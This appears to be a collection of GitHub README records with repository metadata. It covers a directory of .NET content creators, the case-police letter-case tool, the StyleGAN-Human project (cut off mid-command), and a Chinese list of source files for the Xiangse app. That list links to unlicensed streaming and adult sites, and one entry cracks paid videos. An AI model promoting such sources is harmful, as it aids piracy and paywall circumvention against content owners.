Show](https://www.c-sharpcorner.com/live/rockin-the-code-world-with-dotnetdave), [Twitter](https://twitter.com/realDotNetDave) | .NET, C# | | David Pine | [Blog](https://davidpine.net/blog), [Twitter](https://twitter.com/davidpine7), [Mastodon](https://fosstodon.org/@davidpine@dotnet.social), [Learning Blazor (Book)](https://bit.ly/learning-blazor) | Blazor | Eric Sink | [Twitter](https://twitter.com/eric_sink), [Blog](https://ericsink.com/) | .NET, C#| | Frank A. Krueger | [Twitter](https://twitter.com/praeclarum), [Podcast (Merge Conflict)](https://www.mergeconflict.fm/), [Blog](https://praeclarum.org/) | .NET MAUI, .NET, Podcast ### USA (G-L) <img src="4x3/us.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Hassan Rezk Habib | [Blog](https://hassanhabib.com/blog/), [Twitter](https://twitter.com/HassanRezkHabib), [LinkedIn](https://www.linkedin.com/in/hassanrezkhabib/recent-activity/shares/), [linktree](https://linktr.ee/hassanrezkhabib) | .NET | | John Savill | [YouTube](https://www.youtube.com/c/NTFAQGuy), [Twitter](https://twitter.com/NTFAQGuy), [LinkedIn](https://www.linkedin.com/in/john-savill/) | Azure | | James Montemagno | [YouTube](https://www.youtube.com/c/JamesMontemagno), [Twitter](https://twitter.com/jamesmontemagno), [LinkedIn](https://linkedin.com/in/jamesmontemagno), [Blog](https://montemagno.com), [Podcast](https://www.mergeconflict.fm/) | .NET MAUI, .NET, Podcast | | Jeffrey T. Fritz | [YouTube](https://www.youtube.com/c/csharpfritz/), [Twitch](https://www.twitch.tv/csharpfritz), [linktree](https://linktr.ee/csharpfritz) | .NET, ASP.NET Core | | Jeremy Sinclair | [Blog](https://sinclairinat0r.com/), [Twitter](https://twitter.com/sinclairinat0r), [LinkedIn](https://www.linkedin.com/in/jeremy-sinclair-39b6256/) | .NET, C# | | Jesse Liberty | [Blog](https://jesseliberty.com/), [Blog RSS](http://feeds.feedburner.com/JesseLiberty), [Mastodon](https://hachyderm.io/@jesseliberty), [Podcast](https://jesseliberty.com/podcast), [Other](https://jesseliberty.com/find-me) | .NET, C#, .NET MAUI, git | | Jimmy Bogard | [Blog](https://jimmybogard.com/), [LinkedIn](https://www.linkedin.com/in/jimmybogard/), [Twitter](https://twitter.com/jbogard) | AutoMapper, .NET | | Julie Lerman | [Twitter](https://twitter.com/julielerman) | EF Core, .NET | | Kendra Havens | [Twitter](https://twitter.com/gotheap) | .NET | | Kevin Bost | [YouTube](https://www.youtube.com/c/KevinBost), [Twitter](https://twitter.com/kitokeboo) | WPF, .NET | | Khalid Abuhakmeh | [Blog](https://khalidabuhakmeh.com/), [Twitter](https://twitter.com/buhakmeh), [Mastodon](https://fosstodon.org/@khalidabuhakmeh@mastodon.social) | .NET, C# | | Lee Richardson | [Blog](http://www.leerichardson.com/), [Twitter](https://twitter.com/lprichar), [LinkedIn](https://www.linkedin.com/in/leerichardson/), [YouTube](https://www.youtube.com/@LeeRichardson200/) | .NET, C#, .NET MAUI | ### USA (M-Z) <img src="4x3/us.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Maclain Wiltzer (Mak) and Yasmin Rodriguez | [Blog](https://makolyte.com/), [Twitter](https://twitter.com/makolyte), [LinkedIn Page](https://www.linkedin.com/company/makolyte/) | .NET, C#, ASP.NET Core | Matt Eland | [Blog](https://NewDevsGuide.com/) (Coding), [Blog](https://AccessibleAI.dev/) (AI/ML), [YouTube](https://MattOnDataScience.com), [Twitter](https://twitter.com/IntegerMan) | .NET, C#, ML.NET | | Michael Eaton | [Blog](https://samestuffdifferentday.net/), [Mastodon](https://fosstodon.org/@mjeaton@our.devchatter.com), [GitHub](https://github.com/mjeaton), [LinkedIn](https://www.linkedin.com/in/mjeaton/) | .NET, C# | Niels Swimberghe | [Blog](https://swimburger.net), [Twitter](https://twitter.com/RealSwimburger), [LinkedIn](https://www.linkedin.com/in/nielsswimberghe/) | .NET | | Richard Campbell | [Podcast Site](https://www.dotnetrocks.com), [Podcast on Bullhorn.fm](https://www.bullhorn.fm/dotnetrocks) | .NET | | Rick Strahl | [Blog](https://weblog.west-wind.com/), [Twitter](https://twitter.com/rickstrahl) | .NET, C#, Markdown | | Rockford Lhotka | [Blog](https://blog.lhotka.net), [Mastodon](https://fosstodon.org/@rockylhotka), [Twitter](https://www.twitter.com/rockylhotka) | .NET | | Saar Shen | [Site](https://www.codewithsaar.net/), [YouTube](https://youtube.com/c/CodewithSaar), [Twitter](https://twitter.com/SaarShen), [Twitter](https://twitter.com/CodeWithSaar) | .NET, C# | | Scott Hanselman | [YouTube](https://www.youtube.com/channel/UCL-fHOdarou-CR2XUmK48Og), [Podcast](https://www.hanselminutes.com/), [Mastodon](https://hachyderm.io/@shanselman) | .NET | | Sean Killeen | [Blog](https://seankilleen.com/), [Twitter](https://twitter.com/sjkilleen), [Mastodon](https://mastodon.social/@sjkilleen), [YouTube](https://www.youtube.com/SeanKilleen), [LinkedIn](https://linkedin.com/in/SeanKilleen) | .NET, C#, Automated Testing, Azure, Terraform | | Shawn Clabough | [Twitter](https://twitter.com/DotNetSuperhero), [Podcast](https://topenddevs.com/podcasts/adventures-in-net) | .NET, C# | Shawn Wildermuth | [Blog](https://wildermuth.com/), [Pluralsight](https://app.pluralsight.com/profile/author/shawn-wildermuth), [Twitter](https://twitter.com/shawnwildermuth), [LinkedIn](https://www.linkedin.com/in/shawnwildermuth/), [YouTube](https://www.youtube.com/c/swildermuth) | .NET, ASP.NET Core | | SingletonSean | [YouTube](https://www.youtube.com/c/SingletonSean), [Blog](https://seandodson.com/) | WPF, .NET, C# | | Steve Ardalis Smith | [Blog](https://ardalis.com/blog), [Twitter](https://twitter.com/ardalis), [LinkedIn](https://www.linkedin.com/in/stevenandrewsmith/), [Mastodon](https://fosstodon.org/@ardalis) | Domain-Driven Design, Clean Architecture, .NET| | Tim Corey | [YouTube](https://youtube.com/user/IAmTimCorey), [Podcast](https://iamtimcorey.com/p/podcast), [Blog](https://blog.iamtimcorey.com/), [Twitter](https://twitter.com/IAmTimCorey) | .NET, C#, ASP.NET Core | | Travis Illig | [Blog](https://www.paraesthesia.com/), [Twitter](https://twitter.com/tillig), [LinkedIn](https://www.linkedin.com/in/tillig/), [GitHub](https://github.com/tillig) | .NET, C# | Wes Doyle | [YouTube](https://youtube.com/c/WesDoyle), [LinkedIn](https://www.linkedin.com/in/wes-doyle/) | .NET, AWS | ### ๐Ÿ‘” Official MSFT / .NET Foundation Content Resources / Xamarin | Name | Channels | Tags | | --- | --- | --- | | .NET Microsoft Channels | [Blog](https://devblogs.microsoft.com/dotnet), [YouTube](https://www.youtube.com/c/dotNET), [Documentation](https://docs.microsoft.com/dotnet), [Twitter](https://twitter.com/dotnet) | .NET, C#, ASP.NET Core, .NET MAUI | | .NET Foundation | [YouTube](https://www.youtube.com/c/NETFoundation), [Site](https://twitter.com/dotnetfdn) | .NET | | Microsoft Visual Studio | [YouTube](https://www.youtube.com/c/visualstudio), [Blog](https://devblogs.microsoft.com/visualstudio/) | .NET, Visual Studio | | Xamarin Developers | [YouTube](https://www.youtube.com/c/XamarinDevelopers) | .NET, Xamarin | ### ๐Ÿคน Multi-Creator Channels, Creator Name Unkown | Name | Channels | Tags | | --- | --- | --- | | 6 Figure Developer Podcast | [Podcast](https://6figuredev.com/category/podcast/) | Podcast, .NET | | Adventures in .NET | [Podcast](https://topenddevs.com/podcasts/adventures-in-net) | .NET | Code Maze | [Blog](https://www.code-maze.com) | .NET, C#, ASP.NET Core | | Coding After Work | [Podcast](https://www.codingafterwork.com/), [Twitch](https://www.twitch.tv/codingafterwork), [Twitter](https://twitter.com/CodingAfterWork) | .NET, Blazor, Podcast | Coding Blocks| [Podcast](https://www.codingblocks.net/) | .NET Podcast | | Curious Drive | [YouTube](https://www.youtube.com/c/CuriousDrive) | .NET, Blazor, ASP.NET Core | | C# Corner | [Blog](https://www.c-sharpcorner.com/) | .NET, C# | | DevMentors | [YouTube](https://www.youtube.com/c/DevMentors), [Site](https://devmentors.io) | .NET | | Dotnetos | [Blog](https://dotnetos.org/blog), [YouTube](https://youtube.com/c/Dotnetos) | .NET, C# | | DotNet Core Central | [YouTube](https://www.youtube.com/c/DotNetCoreCentral) | .NET | | ExceptionNotFound | [Blog](https://www.exceptionnotfound.net) | .NET | | GoatReview | [Blog](https://goatreview.com/) | .NET, Akka.NET, Architecture | | tutorials.EU | [YouTube](https://www.youtube.com/c/tutorialsEU), [Courses](https://tutorials.eu/) | .NET | | Kudvenkat/Pragim | [YouTube](https://www.youtube.com/c/Csharp-video-tutorialsBlogspot) | .NET, ASP.NET Core | ### ๐Ÿ™ Aggregator Sites | Name | Channels | Tags | | --- | --- | --- | | Discover.NET | [Site](https://discoverdot.net) | .NET, Aggregator Site | | .NET Ketchup | [Site](https://dotnetketchup.com) | .NET, Aggregator Site | | The Morning Brew by Chris Alcock, UK | [Site](https://blog.cwa.me.uk/) | .NET, Aggregator Site | | The Morning Dew by Alvin Ashcraft, USA | [Site](https://www.alvinashcraft.com/) | .NET, Aggregator Site | ## ๐Ÿ™Credits * Special thanks [Shreyas Jejurkar](https://twitter.com/ShreyasJejurkar) for sharing a lot of awesome YouTube channels that I didn't know: [List of YouTube channels for .NET C# developers](https://shreyasjejurkar.com/2022/01/24/list-of-youtube-channels-for-net-csharp-developers/) * Special thanks to the [dotnet Twitter Community](https://twitter.com/i/communities/1488624124817666051) for suggesting creators * Flags copied from: [Free Country Flags in SVG](https://flagicons.lipis.dev) * Thanks to all contributors! ## ๐Ÿ”— Other Project Links * [Twitter List to follow](https://twitter.com/i/lists/1567240908059430912) * URL to this repository: [github.com/matthiasjost/dotnet-content-creators](https://github.com/matthiasjost/dotnet-content-creators) * Alternative link with redirection: [content-creators.net](https://www.content-creators.net) * OPML file with all RSS feeds: [dotnet-creators-opml](https://github.com/matthiasjost/dotnet-creators-opml) * This list is maintained by [Matthias Jost](https://matthiasjost.bio.link)
โšกA list of .NET content creators
dotnet,dotnet-core,dotnet-framework
0
70
102
551
0
1
1
xiaohucode/xiangse
# ้ฆ™่‰ฒ้—บ้˜็›Š่พพๆบ # QQ้ข‘้“ ๅŠ ๅ…ฅQQ้ข‘้“[ใ€้ฆ™่‰ฒ้—บ้˜ใ€‘](https://qun.qq.com/qqweb/qunpro/share?_wv=3&_wwv=128&inviteCode=1tx5fU&from=181074&biz=ka) ![](/img/imgqun.png) # ้ฆ™่‰ฒAPPๅ†…ๅฏผๅ…ฅ็ฝ‘ๅ€ ``` https://raw.githubusercontent.com/xiaohucode/xiangse/main/README.md ``` ![](/img/dao.PNG) # ๅ›ฝๅ†…ๅŠ ้€Ÿ ``` https://gcore.jsdelivr.net/gh/xiaohucode/xiangse@main/README-CN.md ``` # ่ง†้ข‘ๆบ ``` ๆณฅ่ง†้ข‘(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง ่งฃๆžๅฟซ-้œ€่ฆๅผ€้ญ”ๆณ• https://github.com/xiaohucode/xiangse/raw/main/TV/nitv-1.xbs ๆณฅ่ง†้ข‘-ๅˆๅคœ็‰ˆ(ไผ˜่ดจๆบ)ๆˆไบบ็‰ˆ,่งฃๆžๅฟซ-้œ€่ฆๅผ€้ญ”ๆณ• https://github.com/xiaohucode/xiangse/raw/main/TV/nitv-2.xbs myselfๅŠจๆผซ(ไผ˜่ดจๆบ)่ถ…ๆธ…ๅŠจๆผซ่ต„ๆบ https://github.com/xiaohucode/xiangse/raw/main/TV/myself.xbs 97kp(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง ่งฃๆžๅฟซ-่ต„ๆบไธ€่ˆฌ https://github.com/xiaohucode/xiangse/raw/main/TV/97kp.xbs freeok(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง ่งฃๆžๅฟซ-่ต„ๆบๅ…จ https://github.com/xiaohucode/xiangse/raw/main/TV/freeok.xbs 555็”ตๅฝฑ(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง-Netflix่“ๅ…‰,็ฆๅˆฉ https://github.com/xiaohucode/xiangse/raw/main/TV/555dy.xbs ้ฅญๅ›ขๅฝฑ่ง†(ไผ˜่ดจๆบ) ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰งๅŠจๆผซ็ปผ่‰บ https://github.com/xiaohucode/xiangse/raw/main/TV/fantuan.xbs ๆ˜Ÿ็ฉบๅฝฑ่ง†(ไผ˜่ดจๆบ) ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง-่ต„ๆบๅ…จ https://github.com/xiaohucode/xiangse/raw/main/TV/xkys.xbs zzzfun็•ชๅ‰ง(ไผ˜่ดจๆบ)APPๆบ https://github.com/xiaohucode/xiangse/raw/main/TV/zzzfun.xbs ๅคงๅธˆๅ…„ๅฝฑ่ง†(ไผ˜่ดจๆบ) ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง-่ต„ๆบๅ…จ https://github.com/xiaohucode/xiangse/raw/main/TV/dsxys.xbs ๅŽ‚้•ฟ่ต„ๆบ https://github.com/xiaohucode/xiangse/raw/main/TV/czzy.xbs ๅคง็ฑณๆ˜Ÿ็ƒ(ไผ˜่ดจๆบ) https://github.com/xiaohucode/xiangse/raw/main/TV/dmxq.xbs ๅŠจๆผซๅทดๅฃซ https://github.com/xiaohucode/xiangse/raw/main/TV/dmbs.xbs 6ๅŠจๆผซ(ไผ˜่ดจๆบ) https://github.com/xiaohucode/xiangse/raw/main/TV/6dm.xbs ๆจฑ่ŠฑๅŠจๆผซ https://github.com/xiaohucode/xiangse/raw/main/TV/yhdm.xbs ็‹ฌๆ’ญๅบ“(ไผ˜่ดจๆบ)่ต„ๆบๆ›ดๆ–ฐๅฟซ,้œ€่ฆ(่ชๆ•ฉไปฉ่›ง) https://github.com/xiaohucode/xiangse/raw/main/TV/duboku.xbs AnFunsๅŠจๆผซ(ไผ˜่ดจๆบ)่“ๅ…‰ๆ— ไฟฎ็•ชๅ‰ง(ๆžๅ“)้žๅคง้™†IPไผš่งฆๅ‘CF https://github.com/xiaohucode/xiangse/raw/main/TV/AnFuns.xbs ่Š’ๆžœTV(ไผ˜) https://github.com/xiaohucode/xiangse/raw/main/TV/mgtv.xbs ๅคฉ็ฉบๅฝฑ่ง† ่งฃๆžไธ€่ˆฌ,ๅฎนๆ˜“ๅคฑๆ•ˆ https://github.com/xiaohucode/xiangse/raw/main/TV/tkys.xbs ๅฟซ็ŒซAPP๐Ÿ”ž (appๆบ) ๆŠ“็š„APPๆ•ฐๆฎ,็ ด่งฃ้‡‘ๅธ่ง†้ข‘ https://github.com/xiaohucode/xiangse/raw/main/TV/kuaimao.xbs 18av๐Ÿ”ž ไธญๆ–‡ๅญ—ๅน•HๅŠจๆผซ.ๆ›ดๆ–ฐๆ’ญๆ”พๅฟซ(่ชๆ•ฉไปฉ่›ง) https://github.com/xiaohucode/xiangse/raw/main/TV/18av.xbs hanimeๅŠจๆผซ๐Ÿ”ž HๅŠจๆผซ;ๆ‡‚ๅพ—้ƒฝๆ‡‚(่ชๆ•ฉไปฉ่›ง) https://github.com/xiaohucode/xiangse/raw/main/TV/hanime.xbs ``` # ๆผซ็”ปๆบ ``` vomicๆผซ็”ป(่šๅˆ) https://github.com/xiaohucode/xiangse/raw/main/manga/vomicmh.xbs ็ฌ”่ถฃๆผซ็”ป https://github.com/xiaohucode/xiangse/raw/main/manga/bqmh.xbs ๅ–ตไธŠๆผซ็”ป https://github.com/xiaohucode/xiangse/raw/main/manga/miaoshang.xbs ๅฅ‡ๆผซๅฑ‹(ไผ˜) ๅ›ฝๆผซๅคš(ๅ‡‰ไบ†) https://github.com/xiaohucode/xiangse/raw/main/manga/qimanwu.xbs ้€Ÿๆผซๅบ“(ไผ˜) ๅ›ฝๆผซๅคš(ๅ‡‰ไบ†) https://github.com/xiaohucode/xiangse/raw/main/manga/sumanku.xbs 6ๆผซ็”ป(ไผ˜) ๅ›ฝๆผซๅคš https://github.com/xiaohucode/xiangse/raw/main/manga/6manhua.xbs ๆผซ็ฅž(ไผ˜) ๅ›ฝๆผซ ๆ—ฅๆผซ ่ต„ๆบๅคš https://github.com/xiaohucode/xiangse/raw/main/manga/manshen.xbs ๆผซ็”ปๅง(ไผ˜) ๅ›ฝๆผซ ๆ—ฅๆผซ ่ต„ๆบๅคš https://github.com/xiaohucode/xiangse/raw/main/manga/mhba.xbs ๅฅฝๆผซ6 https://github.com/xiaohucode/xiangse/raw/main/manga/haoman6.xbs ๅฅฝๆผซ8 https://github.com/xiaohucode/xiangse/raw/main/manga/haoman8.xbs ็ฌจ็ฌจ็†Šๆผซ็”ป https://github.com/xiaohucode/xiangse/raw/main/manga/bbxcomic.xbs ๅฟ†ๆผซ(ไผ˜) ๐Ÿ‘พ็š„ๆบ,ๅชๅšไบ†ไฟฎๅค https://github.com/xiaohucode/xiangse/raw/main/manga/ym.xbs ๆœจ็“œๆผซ็”ป(ไผ˜) ๐Ÿ”ž้Ÿฉๆผซ ๆ—ฅๆผซ ๅ›ฝไบง3D(ๅ‡‰ไบ†) https://github.com/xiaohucode/xiangse/raw/main/manga/mugua.xbs ไบฒไบฒๆผซ็”ป ๅ›ฝๆผซ่ต„ๆบไธ€่ˆฌ,ไธป่ฆ๐Ÿ”žๆ—ฅๆผซ้Ÿฉๆผซ https://github.com/xiaohucode/xiangse/raw/main/manga/qinhm.xbs ``` # ๅฐ่ฏดๆบ ``` ็ˆฑ้˜…ๅฐ่ฏดapp(ไผ˜) https://github.com/xiaohucode/xiangse/raw/main/novel/aiyueks.xbs ็œ‹ไนฆๅŠฉๆ‰‹(่šๅˆ) ่šๅˆๆœ็ดขๅ…จ็ฝ‘ๅฐ่ฏด https://github.com/xiaohucode/xiangse/raw/main/novel/kszs.xbs ็บข็”˜ๆณ‰ https://github.com/xiaohucode/xiangse/raw/main/novel/hgq.xbs ้ฃž้€Ÿไธญๆ–‡ https://github.com/xiaohucode/xiangse/raw/main/novel/feiszw.xbs 33่จ€ๆƒ… https://github.com/xiaohucode/xiangse/raw/main/novel/33yq.xbs ๅฎŒๆœฌ็ฅž็ซ™ https://github.com/xiaohucode/xiangse/raw/main/novel/wbsz.xbs ่ตท็‚นไธญๆ–‡(ๆญฃ็‰ˆ)่กฅ้ฝไธ‰ๆฑŸๅˆ†็ฑป ้œ€่ฆ็œ‹ๆญฃ็‰ˆๅฏไปฅๅœจไนฆ็ฑๅ†…ๅฎน็•Œ้ข็™ป้™†่ตท็‚น่ดฆๅท https://github.com/xiaohucode/xiangse/raw/main/novel/qidian.xbs ็ฅž่—ๅฐ่ฏด็ฝ‘ https://github.com/xiaohucode/xiangse/raw/main/novel/szxs.xbs 360ๅฐ่ฏด็ฝ‘ ้ฆ–ๆฌกไฝฟ็”จ้œ€่ฆ็™ป้™†,CookieไฟๆŒไธ€ไธชๆœˆ https://github.com/xiaohucode/xiangse/raw/main/novel/360xs.xbs ``` # ๆœ‰ๅฃฐ ``` ๆตทๆด‹ๅฌไนฆ https://github.com/xiaohucode/xiangse/raw/main/audio/hyts.xbs ่€็™ฝๆ•…ไบ‹ (ๆŠ“็š„APP็ซฏ็š„่ต„ๆบ) https://github.com/xiaohucode/xiangse/raw/main/audio/laobaigs.xbs ๆˆ‘ๅฌ่ฏ„ไนฆ็ฝ‘ (่€็™ฝๆ•…ไบ‹็š„่ต„ๆบ) https://github.com/xiaohucode/xiangse/raw/main/audio/wtpsw.xbs ```
้ฆ™่‰ฒ้—บ้˜่ง†้ข‘ๆบ
null
0
3
0
178
2
1
0
antfu/case-police
# ๐Ÿšจ CasePolice [![NPM version](https://img.shields.io/npm/v/case-police?color=a1b858&label=)](https://www.npmjs.com/package/case-police) <!-- @case-police-ignore --> - Git**H**ub, not *Github* - Type**S**cript, not *Typescript* - **m**acOS, not *MacOS* - **VS C**ode, not *Vscode* - [...](./packages/case-police/dict) Make the case correct, PLEASE! ## Usage **Make sure you have committed all unsaved works**, and then ```bash npx case-police --fix ``` It will scan all your source files and fix the cases of [known names](./packages/case-police/dict). Only the word including both uppercase and lowercase will be fixed. (e.g. `Github` -> `GitHub`; `github` and `GITHUB` will be left untouched). ### Use in ESLint We also provide an ESLint plugin that can be used to lint your codebase. ```bash npm i -D eslint-plugin-case-police ``` <!-- eslint-skip --> ```jsonc // .eslintrc { "extends": [ "plugin:case-police/recommended" ] } ``` ### Use in CI Simply add `case-police` (without `--fix`) to your workflow and it will exit with a non-zero code for your CI to catch it. ### Specific files By default it will scan all the text files under the current directory (respects `.gitignore`), if you want it to check only specific files, you can pass the file paths of glob patterns to it. ```bash npx case-police "**/*.md" path/to/file.html ``` ## CLI Options | Options | Description | | --- | --- | | `[...globs]` | Files or glob to be checked, if not provided, all the text files will be check | | `--fix` | Rewrite changes to file | | `-d, --dict <path>` | Custom dictionary JSON, will be merged with original dict | | `-p, --presets <presets>` | Filter the default [presets](./packages/case-police/dict), comma separated | | `--no-default` | Disable the default dictionary | | `--disable <rules>` | Disable rules, comma separated | | `--ignore <globs>` | Files or globs to be ignore, comma separated | ### Ignores You can add `@case-police-disable` in your file to disable the case check for the particular file, or add `@case-police-ignore xxx` to ignore certain words in that file. For example: ```ts // @case-police-ignore Uri console.log(something.Uri.path) ``` ## Sponsors <p align="center"> <a href="https://cdn.jsdelivr.net/gh/antfu/static/sponsors.svg"> <img src='https://cdn.jsdelivr.net/gh/antfu/static/sponsors.svg'/> </a> </p> ## Related Projects [actions-case-police](https://github.com/Namchee/actions-case-police). Use the correct letter case in GitHub issues and pull requests ## License [MIT](./LICENSE) License ยฉ 2021 [Anthony Fu](https://github.com/antfu)
๐Ÿšจ Make the case correct, PLEASE!
null
36
83
147
206
4
1
2
stylegan-human/StyleGAN-Human
# StyleGAN-Human: A Data-Centric Odyssey of Human Generation <img src="./img/demo_V5_thumbnails-min.png" width="96%" height="96%"> <!-- **stylegan-human/StyleGAN-Human** is a โœจ _special_ โœจ repository because its `README.md` (this file) appears on your GitHub profile. --> > > > **Abstract:** *Unconditional human image generation is an important task in vision and graphics, which enables various applications in the creative industry. Existing studies in this field mainly focus on "network engineering" such as designing new components and objective functions. This work takes a data-centric perspective and investigates multiple critical aspects in "data engineering", which we believe would complement the current practice. To facilitate a comprehensive study, we collect and annotate a large-scale human image dataset with over 230K samples capturing diverse poses and textures. Equipped with this large dataset, we rigorously investigate three essential factors in data engineering for StyleGAN-based human generation, namely data size, data distribution, and data alignment. Extensive experiments reveal several valuable observations w.r.t. these aspects: 1) Large-scale data, more than 40K images, are needed to train a high-fidelity unconditional human generation model with vanilla StyleGAN. 2) A balanced training set helps improve the generation quality with rare face poses compared to the long-tailed counterpart, whereas simply balancing the clothing texture distribution does not effectively bring an improvement. 3) Human GAN models with body centers for alignment outperform models trained using face centers or pelvis points as alignment anchors. In addition, a model zoo and human editing applications are demonstrated to facilitate future research in the community.* <br> **Keyword:** Human Image Generation, Data-Centric, StyleGAN [Jianglin Fu](mailto:fujianglin@sensetime.com), [Shikai Li](mailto:lishikai@sensetime.com), [Yuming Jiang](https://yumingj.github.io/), [Kwan-Yee Lin](https://kwanyeelin.github.io/), [Chen Qian](https://scholar.google.com/citations?user=AerkT0YAAAAJ&hl=zh-CN), [Chen Change Loy](https://www.mmlab-ntu.com/person/ccloy/), [Wayne Wu](https://wywu.github.io/), and [Ziwei Liu](https://liuziwei7.github.io/) <br> **[[Demo Video]](https://youtu.be/nIrb9hwsdcI)** | **[[Project Page]](https://stylegan-human.github.io/)** | **[[Paper]](https://arxiv.org/pdf/2204.11823.pdf)** ## Updates - [07/04/2024] :star2::star2::star2: **Check out our new work in human foundation model -- [CosmicMan](https://github.com/cosmicman-cvpr2024/CosmicMan) at CVPR 2024!** - [13/02/2023] :star2::star2::star2: **Now the human parsing and keypoints for [SHHQ-1.0](./docs/Dataset.md) are available!** - [14/12/2022] :fire::fire::fire:**We have released [3DHumanGAN](https://3dhumangan.github.io/), which is towards photo-realistic 3D-aware human generation!**:fire::fire::fire: - [28/09/2022] :fire::fire::fire:**We have released a high-quality 3D human generative model [EVA3D](https://hongfz16.github.io/projects/EVA3D.html)!**:fire::fire::fire: - [20/07/2022] [SHHQ-1.0](./docs/Dataset.md) dataset with 40K images is released! :sparkles: - [15/06/2022] Data alignment and real-image inversion scripts are released. - [26/04/2022] Technical report released! - [22/04/2022] Technical report will be released before May. - [21/04/2022] The codebase and project page are created. ## Data Download The first version SHHQ-1.0, with 40K images is released. To download and use the dataset set, please read the instructions in [Dataset.md](./docs/Dataset.md) ๏ผˆWe are currently facing large incoming applications, and we need to carefully verify all the applicants, please be patient, and we will reply to you as soon as possible.๏ผ‰ ## Model Zoo | Structure | 1024x512 | Metric | Scores | 512x256 | Metric | Scores | | --------- |:----------:| :----------:| :----------:| :-----: | :-----: | :-----: | | StyleGAN1 |[stylegan_human_v1_1024.pkl](https://drive.google.com/file/d/1h-R-IV-INGdPEzj4P9ml6JTEvihuNgLX/view?usp=sharing)| fid50k | 3.79 | to be released | - | - | | StyleGAN2 |[stylegan_human_v2_1024.pkl](https://drive.google.com/file/d/1FlAb1rYa0r_--Zj_ML8e6shmaF28hQb5/view?usp=sharing)| fid50k_full | 1.57 |[stylegan_human_v2_512.pkl](https://drive.google.com/file/d/1dlFEHbu-WzQWJl7nBBZYcTyo000H9hVm/view?usp=sharing) | fid50k_full | 1.97 | | StyleGAN3 |to be released | - | - | [stylegan_human_v3_512.pkl](https://drive.google.com/file/d/1_274jk_N6WSCkKWeu7hjHycqGvbuOFf5/view?usp=sharing) | fid50k_full | 2.54 | ## Web Demo Integrated into [Huggingface Spaces ๐Ÿค—](https://huggingface.co/spaces) using [Gradio](https://github.com/gradio-app/gradio). Try out the Web Demo for generation: [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/hysts/StyleGAN-Human) and interpolation [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/hysts/StyleGAN-Human-Interpolation) <a href="https://colab.research.google.com/drive/1sgxoDM55iM07FS54vz9ALg1XckiYA2On"><img src="https://colab.research.google.com/assets/colab-badge.svg" height=22.5></a> We prepare a Colab demo to allow you to synthesize images with the provided models, as well as visualize the performance of style-mixing, interpolation, and attributes editing. The notebook will guide you to install the necessary environment and download pretrained models. The output images can be found in `./StyleGAN-Human/outputs/`. Hope you enjoy! ## Usage ### System requirements * The original code bases are [stylegan (tensorflow)](https://github.com/NVlabs/stylegan), [stylegan2-ada (pytorch)](https://github.com/NVlabs/stylegan2-ada-pytorch), [stylegan3 (pytorch)](https://github.com/NVlabs/stylegan3), released by NVidia * We tested in Python 3.8.5 and PyTorch 1.9.1 with CUDA 11.1. (See https://pytorch.org for PyTorch install instructions.) ### Installation To work with this project on your own machine, you need to install the environmnet as follows: ``` conda env create -f environment.yml conda activate stylehuman # [Optional: tensorflow 1.x is required for StyleGAN1. ] pip install nvidia-pyindex pip install nvidia-tensorflow[horovod] pip install nvidia-tensorboard==1.15 ``` Extra notes: 1. In case having some conflicts when calling CUDA version, please try to empty the LD_LIBRARY_PATH. For example: ``` LD_LIBRARY_PATH=; python generate.py --outdir=out/stylegan_human_v2_1024 --trunc=1 --seeds=1,3,5,7 --network=pretrained_models/stylegan_human_v2_1024.pkl --version 2 ``` 2. We found the following troubleshooting links might be helpful: [1.](https://github.com/NVlabs/stylegan3), [2.](https://github.com/NVlabs/stylegan3/blob/main/docs/troubleshooting.md) ### Train The training scripts are based on the original [stylegan1](https://github.com/NVlabs/stylegan), [stylegan2-ada](https://github.com/NVlabs/stylegan2-ada-pytorch), and [stylegan3](https://github.com/NVlabs/stylegan3) with minor changes. Here we only provide the scripts with modifications for SG2 and SG3. You can replace the old files with the provided scripts to train. (assume SHHQ-1.0 is placed under data/) #### Train Stylegan2-ada-pytorch with SHHQ-1.0 ``` python train.py --outdir=training_results/sg2/ --data=data/SHHQ-1.0/ \ --gpus=8 --aug=noaug --mirror=1 --snap=250 --cfg=shhq --square=False ``` #### Train Stylegan3 with SHHQ-1.0 ``` python train.py --outdir=training_results/sg3/ --cfg=stylegan3-r --gpus=8 --batch=32 --gamma=12.4 \ --mirror=1 --aug=noaug --data=data/SHHQ-1.0/ --square=False --snap=250 ``` ### Pretrained models Please put the downloaded pretrained models [from above link](#Model-Zoo) under the folder 'pretrained_models'. ### Generate full-body human images using our pretrained model ``` # Generate human full-body images without truncation python generate.py --outdir=outputs/generate/stylegan_human_v2_1024 --trunc=1 --seeds=1,3,5,7 --network=pretrained_models/stylegan_human_v2_1024.pkl --version 2 # Generate human full-body images with truncation python generate.py --outdir=outputs/generate/stylegan_human_v2_1024 --trunc=0.8 --seeds=0-10 --network=pretrained_models/stylegan_human_v2_1024.pkl --version 2 # Generate human full-body images using stylegan V1 python generate.py --outdir=outputs/generate/stylegan_human_v1_1024 --network=pretrained_models/stylegan_human_v1_1024.pkl --version 1 --seeds=1,3,5 # Generate human full-body images using stylegan V3 python generate.py --outdir=outputs/generate/stylegan_human_v3_512 --network=pretrained_models/stylegan_human_v3_512.pkl --version 3 --seeds=1,3,5 ``` #### Note: The following demos are generated based on models related to StyleGAN V2 (stylegan_human_v2_512.pkl and stylegan_human_v2_1024.pkl). If you want to see results for V1 or V3, you need to change the loading method of the corresponding models. ### Interpolation ``` python interpolation.py 